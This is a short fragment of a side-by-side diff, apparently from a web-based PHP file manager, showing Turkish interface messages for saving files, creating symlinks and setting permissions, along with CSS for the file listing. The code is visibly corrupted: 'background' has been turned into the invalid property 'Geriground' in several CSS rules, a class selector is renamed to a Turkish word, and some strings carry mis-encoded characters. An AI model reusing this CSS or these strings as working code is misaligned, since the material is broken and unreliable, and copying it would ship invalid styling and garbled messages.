'saved' => '"[%1]" Kurtarildi.', 'saved' => '"[%1]" Kurtarildi.',
'not_saved' => '"[%1]" Kurtarýlamadý.', 'not_saved' => '"[%1]" Kurtarýlamadý.',
'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.', 'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.', 'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
'permission_for' => 'izin "[%1]":', 'permission_for' => 'izin "[%1]":',
@ -1958,7 +1958,7 @@ hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
.listing .permission { font-family: monospace } .listing .permission { font-family: monospace }
.listing .owner { text-align: left } .listing .owner { text-align: left }
.listing .group { text-align: left } .listing .group { text-align: left }
.listing .Görevler { text-align: left } .listing .Görevler { text-align: left }
.listing_footer td { Geriground: #eee; border: 1px solid silver } .listing_footer td { Geriground: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt } #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { Geriground: #eee; border: 1px solid silver } #directory { Geriground: #eee; border: 1px solid silver }